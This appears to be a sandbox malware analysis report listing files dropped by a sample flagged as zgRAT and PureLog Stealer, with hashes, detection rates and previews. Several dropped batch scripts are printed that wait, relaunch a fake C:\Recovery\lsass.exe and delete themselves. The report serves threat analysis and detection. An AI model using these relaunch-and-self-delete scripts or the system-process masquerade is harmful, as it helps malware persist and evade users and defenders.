                                      SHA1:BFED77633BABAD48EB2A7F1E4E93615596367434
                                      SHA-256:F93DA361BF50D0CDEA0F03C6C5E6ADF73BB0F3CA924BCEF50313BA2F3A83C721
                                      SHA-512:A908D60F53E77B48BE9A47469EB8A1D6378D32DFB9F13C88656998EB48401B4B8CF851E698C6B13BEB2C1EA6EBDCFC7DB7D803FA76897620228939D3A26A7E9A
                                      Malicious:false
                                      Preview:0Y0Bdam517dR3VbxM605G44pir3ZcKigU42udNqSs1eIHqNLooFbZgf6dKcwgMcqY679crU8PiMPZwi2dsvyEGHyY6QSu4vgYytKsOt6UGL0TQhqmjSyaolSzJlgaBOVxq1lDXJP8ze74QeIZkpKl6FtMbVjmMfS20DnZ5nPZDzlKoXjodH0VDu0kHYlCkmvTLFEM0td6auhGdjiDv5JFp7yFNDRgBNzbDS8iSXxtn34TMtGh0iQpcpnOQ89xb65N5GCLk9uYHZcwCf3d6uqd7K8YouRUYASr7rYGq561x1hDN1MvFf1rQcQuHog0raAGHuyUHwwBxzpFm5KxigO2Jlbfbn9BYGJX0a5dD1oTsz4awKILesRLLH7gTS3dxumqqSOL9rur15KTrAsQfxhqy7LsdZJu7Kg7NNue56Mx8kUQ7oyTjn89N61sGgsjhAtqYMFdPNUiltrNm5uyk0KUMguRVBYZOmQ81n1viVDVSZYdOnGLv38qzYe2cxINz5U8dtW8D9QPwyCxIQDr5NoUnjIcJ9TvN0gWEZAeRHHvnt3AWquMuaRlR9V4l3zEqeC6SpssPjayG2r4pHFdPHAwi4FEEG3XSCFIq7sr7B6LAdfYSbOdxWzi
                                      Process:C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):1916928
                                      Entropy (8bit):7.5383466252302025
                                      Encrypted:false
                                      SSDEEP:24576:xTkCAuXonymsrxQZgTOXw0iMyWU2FYEUhBpph/ukrhgSUkInLoA7JkXuTZSjAkDP:JJrx6sOXg8ghhfCSUkIkA7JkUZkuyiT
                                      MD5:BD5DF5DC5869453A2501A80C6FC937F4
                                      SHA1:CE691012B4A2A0D75DFB74D54F4F61AB6194FF91
                                      SHA-256:C7C51C52D0201DECD12006C38608E5E3C935708F5D5014268095040BFAE4E479
                                      SHA-512:F1A09D8691E0FB0185D14D34BBD664F60D0C3CE4C91D5AD8FCEAEA98F47B4CEC9394DEF0EF081D24A422EF15C55E2D5DDCD14AE65AFB1DE6986735398100EA7D
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 83%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................8...........W... ...`....@.. ....................................@..................................V..K....`.. ............................................................................ ............... ..H............text...$7... ...8.................. ..`.rsrc... ....`.......:..............@....reloc...............>..............@..B.................W......H.......T...$...........x....t..LV.......................................0..........(.... ........8........E....\...)...8.......8W...(.... ....~....{....:....& ....8....(.... ....8....(.... ....~....{....9....& ....8....*....0..'....... ........8........E....~...........U...............8y...8.... ....8........~....(Z...~....(^... ....<W... ....~....{|...9....& ....8....~....9.... ....~....{....:l...& ....8a...8.... ....8R...r...ps....z*~....(R... .... .... ....s....~....(V...
                                      Process:C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):138
                                      Entropy (8bit):5.676914721343531
                                      Encrypted:false
                                      SSDEEP:3:03Unx3DyUKidupFfLEN+KIrbNh1JWVBW03mNyEI++aaKcWrXqEpLW/:7nFDipiTIrRZYDHW1pL6
                                      MD5:A896CFD8AEE5834C56DB2CE8368D6A5D
                                      SHA1:F310D43C45B37346DFE9CEB87BE5923085436007
                                      SHA-256:05375D4F470EE3D1DDC8B467F97D8A2A11BDE89D266ABBAA2EEF4787C4840C62
                                      SHA-512:CC5AECAC23B09F933A6A3A134780D33E363000523FF5C8FD8AA496E0F9F11D3F9EB07F37661DC3F327CA70B8B5193539C9C008DA3BB9BEF12A1B4F2D38546475
                                      Malicious:false
                                      Preview:PAgFZH5ew8Skw9iBuw4zPEW41O2zLtWq2jx0GPiPxKHc5c7znazfM92KomNLPFTDmmsNMs5eNpBE638ZRCMu30d2qmLdCX9r1E0Tutn4fVSh7xNuoy3N2iJvIzgjgbczqTM2DoohZR
                                      Process:C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):1916928
                                      Entropy (8bit):7.5383466252302025
                                      Encrypted:false
                                      SSDEEP:24576:xTkCAuXonymsrxQZgTOXw0iMyWU2FYEUhBpph/ukrhgSUkInLoA7JkXuTZSjAkDP:JJrx6sOXg8ghhfCSUkIkA7JkUZkuyiT
                                      MD5:BD5DF5DC5869453A2501A80C6FC937F4
                                      SHA1:CE691012B4A2A0D75DFB74D54F4F61AB6194FF91
                                      SHA-256:C7C51C52D0201DECD12006C38608E5E3C935708F5D5014268095040BFAE4E479
                                      SHA-512:F1A09D8691E0FB0185D14D34BBD664F60D0C3CE4C91D5AD8FCEAEA98F47B4CEC9394DEF0EF081D24A422EF15C55E2D5DDCD14AE65AFB1DE6986735398100EA7D
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 83%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................8...........W... ...`....@.. ....................................@..................................V..K....`.. ............................................................................ ............... ..H............text...$7... ...8.................. ..`.rsrc... ....`.......:..............@....reloc...............>..............@..B.................W......H.......T...$...........x....t..LV.......................................0..........(.... ........8........E....\...)...8.......8W...(.... ....~....{....:....& ....8....(.... ....8....(.... ....~....{....9....& ....8....*....0..'....... ........8........E....~...........U...............8y...8.... ....8........~....(Z...~....(^... ....<W... ....~....{|...9....& ....8....~....9.... ....~....{....:l...& ....8a...8.... ....8R...r...ps....z*~....(R... .... .... ....s....~....(V...
                                      Process:C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
                                      File Type:ASCII text, with very long lines (884), with no line terminators
                                      Category:dropped
                                      Size (bytes):884
                                      Entropy (8bit):5.9152465044215745
                                      Encrypted:false
                                      SSDEEP:24:1rKeqc3B2aOMtpsFu0iRf38sPQNZw8TnC:gen3dOMtpTRf38ZNiiC
                                      MD5:26A745749B4520ABD38A62353AFA44B7
                                      SHA1:47A42F5DE1E8EAEC4EC9995205023E4DBE1DD641
                                      SHA-256:80A64CB267F24BB8BEADAF46B416C0CAE36A35D70B0E9DEC5EC790704900B0C1
                                      SHA-512:DE7C4017C6977718B9FF696D97F79CE774A7F5D9E48E3EEB843EAEB1AF400243795C93FB9660619C85738278EABAD5238682F101AF5C7F6EDB535C454EED6FE4
                                      Malicious:false
                                      Preview:YazNdwzT4FK5NEYD3c1olVr9JWxlSlMN4nKFlOV3e377dtTU3LpGEQRDs0EH8NAT27Aj3ScoG7JsXtfZCcrG6GJoWGWvKO5Q2oFgtubktAAGHjp9UoFfg3XwyWNx5rd2B2zto9pSBHX5GCgwbXafIau8RTrXgnoChIEPt6UV8xdZgbqvzbWiQ8tlH1cVRSvYcVY78RDeCEhV7Vbzm6iFRGvjYdH1e9EqBF6KDsxhX1fMaXovZmsVtqGVkzieKLADA0T1ZRv4IBrakjIAyWc1Rs6U9lkOJSXM0cLjDwWI0yMs9puBqiqytIvS492xqhuzofjIYi7C9TAdgNVT0jhlmjdsq2pE3ibTDXEdGmnIknyZHSvqnj7H9JMEC1bf22Ia2raJJ1NO5ZA8uDkYG8bUlUU3K9bPKIPsfXha2mhvWsLkIOU8QDY3byziWg8JZ8ExJRdXgKfdbp82Iuu5pd8GuVRqi9DWnXWXoYa1u7cGi4cw06ZmvCd697DxAwzgGJ0DTkNtT3LsA2iz3f0ljbkk3ZYrUm07I59YEYdQtpS21v5HZN4f6N7pjPK3LgYrCOkF2JveCk23IstIdRSHrVA48UzzOjEMRlznK0OPbZcWVDg1fBZ4OR9rNqHiU6Qcfpmh2G7mDCqR2oi4x8TMJK89mHaetp5eJ91qb98ZEw0LlryiHMuWnDTUrm4upc3XHLI3x2dy94IWTwY4T1Wg5j1Gqg9yENtl3dEaj5vPt6Ws47B4O9byGWciTCNQ3otvKhd0s8VYFHx8MILtfEjEw5egAfGgsfWEMkiWdKLQoCs9jdVK0dvyFo8PD6zM1yqkuswlkzPU3TatMf6hJ5qOti9hlSThV9YzWIO1rukBOa5vOPDh9SC5Ic0M
                                      Process:C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):1916928
                                      Entropy (8bit):7.5383466252302025
                                      Encrypted:false
                                      SSDEEP:24576:xTkCAuXonymsrxQZgTOXw0iMyWU2FYEUhBpph/ukrhgSUkInLoA7JkXuTZSjAkDP:JJrx6sOXg8ghhfCSUkIkA7JkUZkuyiT
                                      MD5:BD5DF5DC5869453A2501A80C6FC937F4
                                      SHA1:CE691012B4A2A0D75DFB74D54F4F61AB6194FF91
                                      SHA-256:C7C51C52D0201DECD12006C38608E5E3C935708F5D5014268095040BFAE4E479
                                      SHA-512:F1A09D8691E0FB0185D14D34BBD664F60D0C3CE4C91D5AD8FCEAEA98F47B4CEC9394DEF0EF081D24A422EF15C55E2D5DDCD14AE65AFB1DE6986735398100EA7D
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\lsass.exe, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\lsass.exe, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\lsass.exe, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\lsass.exe, Author: Joe Security
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 83%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................8...........W... ...`....@.. ....................................@..................................V..K....`.. ............................................................................ ............... ..H............text...$7... ...8.................. ..`.rsrc... ....`.......:..............@....reloc...............>..............@..B.................W......H.......T...$...........x....t..LV.......................................0..........(.... ........8........E....\...)...8.......8W...(.... ....~....{....:....& ....8....(.... ....8....(.... ....~....{....9....& ....8....*....0..'....... ........8........E....~...........U...............8y...8.... ....8........~....(Z...~....(^... ....<W... ....~....{|...9....& ....8....~....9.... ....~....{....:l...& ....8a...8.... ....8R...r...ps....z*~....(R... .... .... ....s....~....(V...
                                      Process:C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1179
                                      Entropy (8bit):5.354252320228764
                                      Encrypted:false
                                      SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mM:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHK2
                                      MD5:074445AD437DEED8A22F11A846280CE2
                                      SHA1:23025D83D7C33396A5F736FC6F9945976CFCD5D1
                                      SHA-256:B7FD27029E12BE3B5C2C4010CC9C9BCB77CFE44852CC6EF4C3CED70740BB1CFD
                                      SHA-512:440F8E77340A5C2F64BF97BC712193145F03AEDB86C0F5C849CA1AD0190E5621DDD7AE8104862383E31FFEC49CCF483CF2E4533C501B2606EE1D0FE66E865B6D
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                      Process:C:\Recovery\lsass.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1613
                                      Entropy (8bit):5.370675888495854
                                      Encrypted:false
                                      SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKlT4v1qHGIs0HKD:iqbYqGSI6oPtzHeqKktGqZ4vwmj0qD
                                      MD5:5ACBB013936118762389287938AE0885
                                      SHA1:12C6B0AA2B5238E3154F3B538124EE9DB0E496D6
                                      SHA-256:28E292538199310B7DA27C6C743EFD34E1F806D28611B6C9EF4212D132272DEF
                                      SHA-512:E803C699BE7FC25FF09D1DEE86412CE8F18834E22E20B7D036323B740891A64B2CE33D0E0BD075178F0B6F496BA9CFBF7EF1A0884FE5E470C8CCF6D824891C77
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                      Process:C:\Recovery\lsass.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):149
                                      Entropy (8bit):5.078850941138945
                                      Encrypted:false
                                      SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m7vEvIvBktKcKZG1t+kiE2J5xAItL/Ry2RMHn:hCRLuVFOOr+DE7vvvKOZG1wkn23fttl4
                                      MD5:E880C505EE24C8430777C8EC5AF66187
                                      SHA1:0CFB0AA38B40CAFED7137A8E82F0AEC3EE00E9D3
                                      SHA-256:94A88D2AF2C69D35E75791588A999A438D3D48856523CE2B2B510898C3BFD99D
                                      SHA-512:A3AA9C081BD013E4E4734114722C77E00BEE9B4171285681C8BB0FC60FFF282EFB4BAF17B1ACA4F15461193F4FC8A7A87C93E3D6BA2521AFBBB79E480E08E78A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\lsass.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\2JnastWSjL.bat"
                                      Process:C:\Recovery\lsass.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):197
                                      Entropy (8bit):5.099390303652712
                                      Encrypted:false
                                      SSDEEP:6:hCijTg3Nou1SV+DE7vvvKOZG1wkn23fNQeq:HTg9uYDE7vrfbq
                                      MD5:34DF364311C2FC8CD221D7BE5F3ECA7A
                                      SHA1:62E582518F0CC4F5FE302355703EC1933EB40062
                                      SHA-256:641DAF5AA340FC9D2437BAAE6BB23634B6F778CA3EF3BBB5621D957FB62285F7
                                      SHA-512:7D589D95DD0F69D34907DDAC4454E77A25E676C7B9FAF85D700771062EDFC1E42292B2F0C705BF4860A52EB52F17B8A890FCD9820D0D961AE01D5AEC1B87E0BB
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\lsass.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\2juDPxCKYX.bat"
                                      Process:C:\Recovery\lsass.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):149
                                      Entropy (8bit):5.090632927971037
                                      Encrypted:false
                                      SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m7vEvIvBktKcKZG1t+kiE2J5xAIvK5Hn:hCRLuVFOOr+DE7vvvKOZG1wkn23fS5H
                                      MD5:5241898FBA555EEA22F23B4CDB30F70F
                                      SHA1:D878FB8442031ED76806D59E3F9CF7D39B8F60C4
                                      SHA-256:89D587E4DF30E3F98E8D0DD0228EFE40961F051E9FA1B76432B29026218248C3
                                      SHA-512:ABBF2FF3FAA8C639D6888766FE66690DF19A305F21393BC1DD7320017C9CFC339E52468B38A56029BD8836FE216EE4D95447453338533F75F5FA25A891635375
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\lsass.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\5Fkn6foGzf.bat"
                                      Process:C:\Recovery\lsass.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):149
                                      Entropy (8bit):5.10840549143363
                                      Encrypted:false
                                      SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m7vEvIvBktKcKZG1t+kiE2J5xAIZvSizK:hCRLuVFOOr+DE7vvvKOZG1wkn23fZ5zK
                                      MD5:B27BA11B8E96A1C26A23DD8AEC848486
                                      SHA1:95A108DAC79B4C6D0484280BC0860B563B697829
                                      SHA-256:9626E2A1505DD1F8DC536804F63891ADB289728F9C482993C22EC9E3F144D394
                                      SHA-512:8ACFD261B2740A00A15027A5A5719444C7B6CB4262377E5497B33CFFBB053FFDA531993AB65519C6DE98EAFE022549B7BEDED5B0E54AA8D60E9D3961B61E2574
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\lsass.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\5tk1CddJ7G.bat"
                                      Process:C:\Recovery\lsass.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.4838561897747224
                                      Encrypted:false
                                      SSDEEP:3:bLqMmLTj01zn:nqM+0x
                                      MD5:019371CE95C868CE12F1692784C44974
                                      SHA1:3FB1F1BA100120627180E3F6F34E99FFCB955A7F
                                      SHA-256:B097E79B17ACDF86394649B5F0451EA042AF2BA11C344E786AE1010AD77BEAE0
                                      SHA-512:08D37D58DFA343EBC3728861FBA567414CF0420DE13ED3E21239E2E18351D3E9BCD86DADB6ADF08BE7D40DB217F946E60FB8E021C92CCEEF1E8484F01CB1EB1D
                                      Malicious:false
                                      Preview:s9dIecXYkACn68DI2rcyK5PNB
                                      Process:C:\Recovery\lsass.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.403856189774723
                                      Encrypted:false
                                      SSDEEP:3:hUKCj8V3JVn:VCj8djn
                                      MD5:F1E1D15FB95CB93E628F7095830D3B3E
                                      SHA1:C37BCA0BB5B2316697FE4BAED781DAC48E684A53
                                      SHA-256:A5E744E684A270F04BA291C1379C243B8A469894E8BEAC728776D206A4E87DA5
                                      SHA-512:73BE003DA61D3458EABBF42F2CAE4E928321C7177E356BF8D297142408C7C17C5820E632CC9076F3A435D545A450970776372B5C55355A583E0DEF9167F0D2B4
                                      Malicious:false
                                      Preview:xu7bhBK9r3o2wTG5xYpRlKgus
                                      Process:C:\Recovery\lsass.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.293660689688185
                                      Encrypted:false
                                      SSDEEP:3:p/e2G7V:67V
                                      MD5:E49928651513704319560F22D272DF11
                                      SHA1:7A910F4914C9910C1EA72662A220134498687D41
                                      SHA-256:F6F4C0670A95A35BD288401C3B709C0D10E7D712D4EA4520587829C4B184FCD2
                                      SHA-512:20788615CB8E2F80A14EFAAC1E721D2AD8994899E91DE9B42B38FD011A38C050FD75C57B1F44C404BA6FB1259D2B3B24DF3E980D035C6BC09925BE7CE2108745
                                      Malicious:false
                                      Preview:DBKQIXk89SYjvQDzYLYxCygr0
                                      Process:C:\Recovery\lsass.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.483856189774723
                                      Encrypted:false
                                      SSDEEP:3:kw4XxLvr:5axLvr
                                      MD5:57925106733316037B4E69FD20D27C33
                                      SHA1:20399F4DF7DE552DFF02445FE765D3D0D5FF6578
                                      SHA-256:723BB03FBAFF24A2DC4A4989B682B7425930E8AA5F62B4303996781A2D0C7ACA
                                      SHA-512:F22D31F1E42541EA23D91425B2213C80FC16BFE916A9895B5F3516A77E4E5AEBDA2EC54DC70CEC23D8112BF1218C6FC70B8D740CC69FB438939279C78FF3C306
                                      Malicious:false
                                      Preview:jGZof3ztUylrp7YJvJRK6Mtes
                                      Process:C:\Recovery\lsass.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.453660689688183
                                      Encrypted:false
                                      SSDEEP:3:UQeWINNn:J/Cn
                                      MD5:ECF60AAC9B88DAA9F173C1AF56D1BE56
                                      SHA1:1F785A17375DBD4E52E511B5B5B7B519B64C27DD
                                      SHA-256:0190558C42A0E34888BEFB093B1625D7AC5CDBC2ACC1E7FEDF763FCB6B146019
                                      SHA-512:591ACD15E327919E9FB08697AEDA0D0CF3DE09ADA97C04A030EADA47C9D6515AC2566A5311236035819E83DFDDA4B96B4FE584905BAF025595BED2260C0C72FC
                                      Malicious:false
                                      Preview:TaPJ5JsuJUQe8KyOkXCM0hq1B
                                      Process:C:\Recovery\lsass.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.323856189774723
                                      Encrypted:false
                                      SSDEEP:3:/pUrJEQBW:h4J58
                                      MD5:D68D766256D1B5E66F6594A0F7568191
                                      SHA1:00F292D40AAC33D3986868F05A90CCC69F43A087
                                      SHA-256:8F094155C106C95241094B39D5F1174D652EC76AABB73DC6F2986B9C598D3C40
                                      SHA-512:81B706B9917AB50EE24F3A99AFD9674D7CE933D8B72B0B8418469FF49A9E29AB3CA5B980A4E42D7DE021BB0AB0456C66950C12B76C8F6B7F72FE94A77B2AB17E
                                      Malicious:false
                                      Preview:rOqL1SoRtHfI5LNau5N6G8Ema
                                      Process:C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.023465189601646
                                      Encrypted:false
                                      SSDEEP:3:mrxyXSgSc:mxc
                                      MD5:012D93023A8B1DFAC5B573118EBC2255
                                      SHA1:1CCD0C662D67688A6E130F05EA19A357C9678E58
                                      SHA-256:DCB8D733DAAA742FCA3604D024E166D2F51D9C573784376FC3225780BDD5D946
                                      SHA-512:D246C3F61A051FE4DBDCE5ADE05D80C40E0C20829A6459E5DFFE793965B9532A020272D8CD2F16198B9176423B67F5F3F1A2102299E4B48148895C5527B7E6ED
                                      Malicious:false
                                      Preview:DwjNsZYfNLzwEYrwn1Zj5Nhob
                                      Process:C:\Recovery\lsass.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):149
                                      Entropy (8bit):5.1000490317166065
                                      Encrypted:false
                                      SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m7vEvIvBktKcKZG1t+kiE2J5xAI7R:hCRLuVFOOr+DE7vvvKOZG1wkn23fN
                                      MD5:C3BB83CB53AA2D4F040BC6A55A2D8693
                                      SHA1:570BBBD7C281AB5CB506E7BC9F92113116CAB085
                                      SHA-256:DA515CD70E9A07E65846854BB9827CE7C6DDB72DF95DDFA861A2F66460B6D1F9
                                      SHA-512:74D11DA0522F6B65FA558FCF5D644A2D64F1F674C595250E290113C44DF20538E78C6B577AB9D9F5A036C64370BA76D67A86B23F61C330CF56941713361B7BD0
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\lsass.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\PdP1UB7pUq.bat"
                                      Process:C:\Recovery\lsass.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.403856189774723
                                      Encrypted:false
                                      SSDEEP:3:oxK/10ux:oxk+ux
                                      MD5:1652217EA06BF080F5F65A4505E1B3F6
                                      SHA1:ACD6BC928E29CD510FE275765A00CC30CBFD7614
                                      SHA-256:F199DEC07178EC254A4C14C8A5B8ED97A3006B1B0BC374F3563FCA80B14CBF08
                                      SHA-512:5A3D93371776A7CD855CBFF9DFF4962331202456215BA18FE8A6E37EDFDC4F99F9097D8CC4C1092E59ED036097985B60C83F74A771B19A2B561E7EDC89F53D70
                                      Malicious:false
                                      Preview:AJhCD0K87z5UxrZd4PQ1RSSRr
                                      Process:C:\Recovery\lsass.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):197
                                      Entropy (8bit):5.064697578494658
                                      Encrypted:false
                                      SSDEEP:6:hCijTg3Nou1SV+DE7vvvKOZG1wkn23fNH:HTg9uYDE7vrf9
                                      MD5:4454C7D96B86C66D96A442EDB51963D6
                                      SHA1:1020160AFF9BA8E533B78CF5D30E485CA76AB822
                                      SHA-256:03401137CE4D4269AE008723AF6FFEAD4CA19302A6D25DDB8B9D9A6E1F33C3C5
                                      SHA-512:A270DCBFAB534ED07598AAC3BDF556E44B4618208550A8E6B28665AD86FC4792DF06A4ED9088946B134C469CAA2EED74A8A29C493DB406437144B27D8A232FF6
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\lsass.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\TqMgut2j0M.bat"
                                      Process:C:\Recovery\lsass.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.103465189601645
                                      Encrypted:false
                                      SSDEEP:3:HUNinzLA+7n:HMinzLA+7
                                      MD5:FFE21E81A346803A96BAB608EDCB140B
                                      SHA1:B005CDEDE598F7EE25FB7BFA58D4DCBBBEEE3730
                                      SHA-256:832C86C39908BD5ADA00D1BF3C5809D01B187B37FA9F50C4D0E322C7EC81AE11
                                      SHA-512:9084BBB989448EC5B494B34A4DF1964AE13059B858B393D2AE66270198742507AE585843BF67B536DF1918E95037EAF45931678B448AC63D5E10EAE639487244
                                      Malicious:false
                                      Preview:sC4x3lOaBeyY1XKESnY4V4ySy
                                      Process:C:\Recovery\lsass.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):25
                                      Entropy (8bit):4.243856189774723
                                      Encrypted:false
                                      SSDEEP:3:CNchvB:CkB
                                      MD5:2964126A61C3C68B61C9D79A07F60952
                                      SHA1:5A362C0FE0C32B856D1D7B5100EA7E3A70CE165E
                                      SHA-256:E57342202AC85B71D54AAE7D9267ABAC47BF7681949877F1CD27C11F90C488A7
                                      SHA-512:03EE543C356F563DC5B7308805F7D17023F42D16E83D8953019F6B4A8C425E1B9C9FDD4795719D97B22A2B3F6B2463BE44A5F1E5DCB05EE88CEA3B8AE16043CD
                                      Malicious:false
                                      Preview:txc3oOB6ybnI76OrckpLdpLM9
                                      Process:C:\Recovery\lsass.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):197
                                      Entropy (8bit):5.063052661540674
                                      Encrypted:false
                                      SSDEEP:6:hCijTg3Nou1SV+DE7vvvKOZG1wkn23fIxNcG:HTg9uYDE7vrfAX
                                      MD5:C1C496085E636EDA547612A535D9A0C9
                                      SHA1:F47E88383C0D5906BFE72EFC98D52844F8949872
                                      SHA-256:6E65221DFDD26A4FD17F3D6748B65054C070363125A9193023916122073DC6FF
                                      SHA-512:585786419DBF76C1947A718E5BA30893973C5463B4ED98C5D6A4AF41F9F39E635B3B9D3D3C74D65BFAF3B698641686E0C520474B57DE3DA2C32559E52D44C266
                                      Malicious:true
                                      Antivirus:
